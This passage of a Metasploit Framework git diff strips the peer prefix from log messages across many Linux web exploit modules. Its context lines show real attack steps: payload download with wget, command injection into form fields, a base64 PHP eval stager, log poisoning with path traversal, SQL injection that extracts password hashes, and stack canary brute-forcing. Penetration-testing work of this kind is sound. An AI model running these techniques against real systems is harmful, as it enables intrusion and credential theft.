admin/#{Rex::Text.decode_base64(base64_password)} failed...") if @server.nil? - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") send_command(payload.encoded) end @@ -252,14 +252,14 @@ class Metasploit3 < Msf::Exploit::Remote loot = '' until exploit_sqli(i, "\x00") - vprint_status("#{peer} - Bruteforcing position #{i}") + vprint_status("Bruteforcing position #{i}") c = brute_force_char(i) if c.nil? return nil else loot << c end - vprint_status("#{peer} - Found: #{loot}") + vprint_status("Found: #{loot}") i = i + 1 end @@ -297,7 +297,7 @@ class Metasploit3 < Msf::Exploit::Remote return false end - vprint_warning("#{peer} - Unknown fingerprint while exploiting SQLi... be careful") + vprint_warning("Unknown fingerprint while exploiting SQLi... be careful") false end diff --git a/modules/exploits/linux/http/linksys_themoon_exec.rb b/modules/exploits/linux/http/linksys_themoon_exec.rb index 1831de7645..16b771a9f4 100644 --- a/modules/exploits/linux/http/linksys_themoon_exec.rb +++ b/modules/exploits/linux/http/linksys_themoon_exec.rb @@ -109,13 +109,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the vulnerable URL...") + print_status("Trying to access the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager({:flavor => :echo}) end diff --git a/modules/exploits/linux/http/multi_ncc_ping_exec.rb b/modules/exploits/linux/http/multi_ncc_ping_exec.rb index 67a93ba046..41bace5c42 100644 --- a/modules/exploits/linux/http/multi_ncc_ping_exec.rb +++ b/modules/exploits/linux/http/multi_ncc_ping_exec.rb @@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Accessing the vulnerable URL...") + print_status("Accessing the vulnerable URL...") unless check == Exploit::CheckCode::Detected fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") @pl = generate_payload_exe @payload_url = '' @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}" - print_status("#{peer} - Downloading the payload to the target machine...") + print_status("Downloading the payload to the target machine...") res = exec_command(cmd) if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote def chmod_payload cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" - print_status("#{peer} - chmod the payload...") + print_status("chmod the payload...") res = exec_command(cmd, 1) unless res @@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote def exec_payload cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = exec_command(cmd, 1) unless res diff --git a/modules/exploits/linux/http/mutiny_frontend_upload.rb b/modules/exploits/linux/http/mutiny_frontend_upload.rb index bd9cf31035..f2b62feae3 100644 --- a/modules/exploits/linux/http/mutiny_frontend_upload.rb +++ b/modules/exploits/linux/http/mutiny_frontend_upload.rb @@ -143,9 +143,9 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else fail_with(Failure::NoAccess, "#{peer} - Login failed, review USERNAME and PASSWORD options") end @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit_native - print_status("#{peer} - Uploading executable Payload file") + print_status("Uploading executable Payload file") elf = payload.encoded_exe elf_location = "/tmp" elf_filename = "#{rand_text_alpha_lower(8)}.elf" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") jsp = jsp_execute_command("#{elf_location}/#{elf_filename}") jsp_location = "/usr/jakarta/tomcat/webapps/ROOT/m" jsp_filename = "#{rand_text_alpha_lower(8)}.jsp" @@ -174,7 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri(target_uri.path, "m", jsp_filename), diff --git a/modules/exploits/linux/http/netgear_readynas_exec.rb b/modules/exploits/linux/http/netgear_readynas_exec.rb index 9fce52a1a5..2927c2bb20 100644 --- a/modules/exploits/linux/http/netgear_readynas_exec.rb +++ b/modules/exploits/linux/http/netgear_readynas_exec.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit my_payload = "#{rand_text_numeric(1)});use MIME::Base64;system(decode_base64(\"#{Rex::Text.encode_base64(payload.encoded)}\")" - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_payload(my_payload) end diff --git a/modules/exploits/linux/http/nginx_chunked_size.rb b/modules/exploits/linux/http/nginx_chunked_size.rb index be5ae4c9c3..14e5d58793 100644 --- a/modules/exploits/linux/http/nginx_chunked_size.rb +++ b/modules/exploits/linux/http/nginx_chunked_size.rb @@ -85,7 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -213,16 +213,16 @@ class Metasploit4 < Msf::Exploit::Remote else if not datastore['CANARY'] == 0xffffffff - print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY']) + print_status("Using 0x%08x as stack canary" % datastore['CANARY']) canary = datastore['CANARY'] else - print_status("#{peer} - Searching for stack canary") + print_status("Searching for stack canary") canary = find_canary if canary.nil? || canary == 0x00000000 fail_with(Failure::Unknown, "#{peer} - Unable to find stack canary") else - print_good("#{peer} - Canary found: 0x%08x\n" % canary) + print_good("Canary found: 0x%08x\n" % canary) end end @@ -246,11 +246,11 @@ class Metasploit4 < Msf::Exploit::Remote # First byte of the canary is already known canary = "\x00" - print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00) + print_status("Assuming byte 0 0x%02x" % 0x00) # We are going to bruteforce the next 3 bytes one at a time 3.times do |c| - print_status("#{peer} - Bruteforcing byte #{c + 1}") + print_status("Bruteforcing byte #{c + 1}") 0.upto(255) do |i| data = random_chunk_size(1024) @@ -259,7 +259,7 @@ class Metasploit4 < Msf::Exploit::Remote data << i.chr unless send_request_fixed(data).nil? - print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i) + print_good("Byte #{c + 1} found: 0x%02x" % i) canary << i.chr break end diff --git a/modules/exploits/linux/http/openfiler_networkcard_exec.rb b/modules/exploits/linux/http/openfiler_networkcard_exec.rb index 782cd0a2e1..d3bc972546 100644 --- a/modules/exploits/linux/http/openfiler_networkcard_exec.rb +++ b/modules/exploits/linux/http/openfiler_networkcard_exec.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # retrieve software version from login page - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ 'uri' => '/' @@ -83,7 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = Rex::Text.uri_encode("&#{payload.raw}&") # send payload - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/admin/system.html', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res and res.code == 200 and res.body =~ /System : Network Setup<\/title>/ - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") elsif res and res.code == 302 and res.headers['Location'] =~ /\/index\.html\?redirect/ fail_with(Failure::NoAccess, 'Authentication failed') else diff --git a/modules/exploits/linux/http/pandora_fms_exec.rb b/modules/exploits/linux/http/pandora_fms_exec.rb index 110c774531..8d08d715ac 100644 --- a/modules/exploits/linux/http/pandora_fms_exec.rb +++ b/modules/exploits/linux/http/pandora_fms_exec.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - print_status("#{peer} - Trying to escalate privileges to root") + print_status("Trying to escalate privileges to root") [ # ignore SIGHUP so the server doesn't kill our root shell "trap '' HUP", @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + print_status("Trying to detect Pandora FMS Remote Gateway") res = send_request_cgi({ 'method' => 'GET', @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") - print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + print_good("Pandora FMS Remote Gateway Detected!") return Exploit::CheckCode::Detected end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb index 070c50dd90..9c17429b93 100644 --- a/modules/exploits/linux/http/pandora_fms_sqli.rb +++ b/modules/exploits/linux/http/pandora_fms_sqli.rb @@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") version = nil res = send_request_cgi({ @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote end unless version.nil? - vprint_status("#{peer} - Pandora FMS #{version} found") + vprint_status("Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end @@ -120,13 +120,13 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_status("#{peer} - Extracted auto login password (#{password})") + print_status("Extracted auto login password (#{password})") else - print_error("#{peer} - No auto login password has been defined!") + print_error("No auto login password has been defined!") return false end - print_status("#{peer} - Attempting to authenticate using (admin:#{password})") + print_status("Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', @@ -146,17 +146,17 @@ class Metasploit3 < Msf::Exploit::Remote def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') - print_status("#{peer} - Successfully authenticated!") - print_status("#{peer} - Attempting to retrieve session cookie") + print_status("Successfully authenticated!") + print_status("Attempting to retrieve session cookie") @cookie = res.get_cookies if @cookie.include?('PHPSESSID') - print_status("#{peer} - Successfully retrieved session cookie: #{@cookie}") + print_status("Successfully retrieved session cookie: #{@cookie}") return true else - print_error("#{peer} - Error retrieving cookie!") + print_error("Error retrieving cookie!") end else - print_error("#{peer} - Authentication failed!") + print_error("Authentication failed!") end false @@ -177,9 +177,9 @@ class Metasploit3 < Msf::Exploit::Remote password = inject_sql(sqli, clue) if password && password.length != 0 - print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]") + print_good("Extracted admin password hash, unsalted md5 - [ #{password} ]") else - print_error("#{peer} - Unable to extract password hash!") + print_error("Unable to extract password hash!") return false end end @@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote if match result = match[1] else - print_error("#{peer} - SQL injection failed") + print_error("SQL injection failed") end end result @@ -229,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/ hash = $1 else - print_error("#{peer} - Could not extract hash from response!") + print_error("Could not extract hash from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/ hash2 = $1 else - print_error("#{peer} - Could not extract hash2 from response!") + print_error("Could not extract hash2 from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -245,11 +245,11 @@ class Metasploit3 < Msf::Exploit::Remote if form =~ /(?<=name="real_directory" type="hidden" value=")(.*?)(" \/>)/ real_directory = $1 else - print_error("#{peer} - Could not extract real_directory from response!") + print_error("Could not extract real_directory from response!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end else - print_error("#{peer} - Could not identify upload form!") + print_error("Could not identify upload form!") fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -266,7 +266,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("#{hash2}", nil, nil, 'form-data; name="hash2"') post_data.add_part('1', nil, nil, 'form-data; name="upload_file_or_zip"') - print_status("#{peer} - Attempting to upload payload #{@payload_name}...") + print_status("Attempting to upload payload #{@payload_name}...") res = send_request_cgi({ 'method' => 'POST', 'cookie' => @cookie, @@ -281,7 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body.include?("Upload correct") register_file_for_cleanup(@payload_name) - print_status("#{peer} - Successfully uploaded payload") + print_status("Successfully uploaded payload") else fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!") end @@ -290,24 +290,24 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # First try to authenticate using default or user-supplied credentials - print_status("#{peer} - Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") + print_status("Attempting to authenticate using (#{datastore['USER']}:#{datastore['PASS']})") auth = authenticate unless auth - print_status("#{peer} - Attempting to extract auto login hash via SQLi") + print_status("Attempting to extract auto login hash via SQLi") auth = login_hash end unless auth - print_status("#{peer} - Attempting to extract admin password hash with SQLi") + print_status("Attempting to extract admin password hash with SQLi") extract fail_with(Failure::NoAccess, "#{peer} - Unable to perform remote code execution!") end - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") upload - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'images', @payload_name), diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb index 8806f177b8..3cf0aafc86 100644 --- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb @@ -82,13 +82,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Detected fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") execute_cmdstager( :flavor => :echo, diff --git a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb index 95759912b2..56c7f7425a 100644 --- a/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb +++ b/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb @@ -109,7 +109,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 1 - Establish a session with the target which will give us a PHP object we can # work with. begin - print_status("#{peer} - Establishing session with target ...") + print_status("Establishing session with target ...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri), 'method' => 'GET', @@ -129,13 +129,13 @@ class Metasploit4 < Msf::Exploit::Remote # Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly # then update it so that it's an admin session before re-encrypting - print_status("#{peer} - Upgrading session to administrator ...") + print_status("Upgrading session to administrator ...") php_object = decode_cookie(cookie_value) - vprint_status("#{peer} - PHP Object: #{php_object}") + vprint_status("PHP Object: #{php_object}") admin_php_object = set_string(php_object, 'is_admin', 'yes') admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT']) - vprint_status("#{peer} - Admin PHP object: #{admin_php_object}") + vprint_status("Admin PHP object: #{admin_php_object}") admin_cookie_value = encode_cookie(admin_php_object) @@ -146,7 +146,7 @@ class Metasploit4 < Msf::Exploit::Remote config_time = ::Time.now.to_i begin - print_status("#{peer} - Extracting existing host configuration ...") + print_status("Extracting existing host configuration ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'), 'method' => 'GET', @@ -173,8 +173,8 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.") end - print_good("#{peer} - Host configuration extracted.") - vprint_status("#{peer} - Host configuration: #{host_config}") + print_good("Host configuration extracted.") + vprint_status("Host configuration: #{host_config}") # Step 4 - replace the host device description with a custom payload that can # be used for LFI. We have to keep the payload small because of size limitations @@ -191,7 +191,7 @@ class Metasploit4 < Msf::Exploit::Remote installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));" stager = Rex::Text.encode_base64(installer) stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>") - vprint_status("#{peer} - Stager: #{stager}") + vprint_status("Stager: #{stager}") # Butcher the XML directly rather than attempting to use REXML. The target XML # parser is way to simple/flaky to deal with the proper stuff that REXML @@ -203,7 +203,7 @@ class Metasploit4 < Msf::Exploit::Remote vprint_status(xml_payload) # Step 5 - set the host description to the stager so that it is written to disk - print_status("#{peer} - Uploading stager ...") + print_status("Uploading stager ...") begin res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), @@ -227,10 +227,10 @@ class Metasploit4 < Msf::Exploit::Remote fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).") end - print_good("#{peer} - Stager uploaded.") + print_good("Stager uploaded.") # Step 6 - Invoke the stage, passing in a self-deleting php script body. - print_status("#{peer} - Executing stager ...") + print_status("Executing stager ...") payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00") payload_cookie_value = encode_cookie(payload_php_object) self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>" @@ -250,20 +250,20 @@ class Metasploit4 < Msf::Exploit::Remote ) if res && res.code == 200 - print_good("#{peer} - Stager execution succeeded, payload ready for execution.") + print_good("Stager execution succeeded, payload ready for execution.") else - print_error("#{peer} - Stager execution failed (invalid result).") + print_error("Stager execution failed (invalid result).") errored = true end rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable - print_error("#{peer} - Stager execution failed (unable to establish connection).") + print_error("Stager execution failed (unable to establish connection).") errored = true end # Step 7 - try to restore the previous configuration, allowing exceptions # to bubble up given that we're at the end. This step is important because # we don't want to leave a trail of junk on disk at the end. - print_status("#{peer} - Restoring host config ...") + print_status("Restoring host config ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'), 'method' => 'POST', @@ -281,7 +281,7 @@ class Metasploit4 < Msf::Exploit::Remote # Step 8 - invoke the installed payload, but only if all went to plan. unless errored - print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...") + print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...") res = send_request_cgi( 'uri' => normalize_uri(target_uri, payload_file), 'method' => 'GET', @@ -325,7 +325,7 @@ class Metasploit4 < Msf::Exploit::Remote cookie_value = xor(block, datastore['XORKEY']) cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value)) - vprint_status("#{peer} - Cookie value: #{cookie_value}") + vprint_status("Cookie value: #{cookie_value}") cookie_value end diff --git a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb index 38434f957a..234cf47a2d 100644 --- a/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb +++ b/modules/exploits/linux/http/smt_ipmi_close_window_bof.rb @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = self.send(target[:callback]) - print_status("#{peer} - Sending exploit...") + print_status("Sending exploit...") send_close_window_request(buffer, payload.encoded) end diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index f3e0af32f5..a98731bc11 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data = "subnet=" post_data << "\";" + payload.raw + ";#" - print_status("#{peer} - Sending Command injection") + print_status("Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ - print_error("#{peer} - Probably command not executed, aborting!") + print_error("Probably command not executed, aborting!") return end diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 5eef56db31..6a0538c640 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part(after_filename, "application/octet-stream", nil, "form-data; name=\"after_filename\"") post_data.add_part("<?php #{payload.encoded} ?>", "image/gif", nil, "form-data; name=\"new_image\"; filename=\"#{payload_name}\"") - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote # of the default file, we assume we uploaded the malicious # file successfully if not res or res.code != 200 or res.body !~ /temp.php/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb index ca0376af14..b2f4258902 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_lfi.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_lfi.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote php = %Q|<?php #{payload.encoded} ?>| # Inject PHP to log - print_status("#{peer} - Injecting PHP to log...") + print_status("Injecting PHP to log...") res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{php}" @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Exploit::Remote # Use the directory traversal to load the PHP code # access_log takes a long time to retrieve - print_status("#{peer} - Loading PHP code..") + print_status("Loading PHP code..") send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log' }) - print_status("#{peer} - Waiting for a session, may take some time...") + print_status("Waiting for a session, may take some time...") select(nil, nil, nil, 1) diff --git a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb index 9cfd6f0a9a..6a331e2b35 100644 --- a/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb +++ b/modules/exploits/linux/http/synology_dsm_sliceupload_exec_noauth.rb @@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote end def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote model = $~[:model].sub(/^[a-z]+/) { |s| s[0].upcase } model = "DS#{model}" unless model =~ /^[A-Z]/ else - vprint_status("#{peer} - Detection failed") + vprint_status("Detection failed") return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Model #{model} with version #{version}-#{build} detected") + vprint_status("Model #{model} with version #{version}-#{build} detected") case version when '4.0' @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote post_body.gsub!(/\r\n(--#{mime_msg.bound})/, ' \\1') # send request to append shell commands - print_status("#{peer} - Injecting the payload...") + print_status("Injecting the payload...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('webman', 'imageSelector.cgi'), @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote end # send request to invoke the injected shell commands - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('redirect.cgi'), @@ -155,7 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response, probably the exploit failed") end - print_good("#{peer} - Command successfully executed") + print_good("Command successfully executed") print_line(res.body) end end diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb index e64f6b7146..0d9432b712 100644 --- a/modules/exploits/linux/http/vap2500_tools_command_exec.rb +++ b/modules/exploits/linux/http/vap2500_tools_command_exec.rb @@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to access the device ...") + print_status("Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end - print_status("#{peer} - Exploiting...") + print_status("Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd @@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ - print_good("#{peer} - Command sent successfully") + print_good("Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m - print_status("#{peer} - Command output: #{$1}") + print_status("Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") diff --git a/modules/exploits/linux/http/wanem_exec.rb b/modules/exploits/linux/http/wanem_exec.rb index 2ee3d5bb07..3411f73fc1 100644 --- a/modules/exploits/linux/http/wanem_exec.rb +++ b/modules/exploits/linux/http/wanem_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode("echo #{fingerprint}") data << "%26" - vprint_status("#{peer} - Sending check") + vprint_status("Sending check") begin res = send_request_cgi({ @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "pc=127.0.0.1; " data << Rex::Text.uri_encode(payload.raw) data << "%26" - print_status("#{peer} - Sending payload (#{payload.raw.length} bytes)") + print_status("Sending payload (#{payload.raw.length} bytes)") begin res = send_request_cgi({ 'uri' => '/WANem/result.php', @@ -100,12 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => data }, 25) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Connection failed") + print_error("Connection failed") end if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else - print_error("#{peer} - Sending payload failed") + print_error("Sending payload failed") end end diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 0aa9a24a84..af414339ba 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = target_uri.path - print_status("#{peer} - Housing php payload...") + print_status("Housing php payload...") # Allow commands to be passed as a header. # We use 'data' instead of 'vars_post to avoid the MSF API escapeing our stuff. @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote 'data' => post_data }) - print_status("#{peer} - Loading our payload...") + print_status("Loading our payload...") # Execute our payload send_request_raw({ diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 27ad401c98..aaa3c51f36 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -82,8 +82,8 @@ class Metasploit3 < Msf::Exploit::Remote peer = "#{client.peerhost}:#{client.peerport}" if client.type != "meterpreter" - print_error("#{peer} - NOTE: you must use a meterpreter payload in order to automatically cleanup.") - print_error("#{peer} - The currencies.php won't be restored automatically.") + print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.") + print_error("The currencies.php won't be restored automatically.") return end @@ -102,19 +102,19 @@ class Metasploit3 < Msf::Exploit::Remote currencies_php = currencies_php.gsub(/^ {6}/, '') pwd = client.fs.dir.pwd - print_status("#{peer} - Searching currencies.php file from #{pwd}") + print_status("Searching currencies.php file from #{pwd}") res = client.fs.file.search(nil, "currencies.php", true, -1) res.each do |hit| filename = 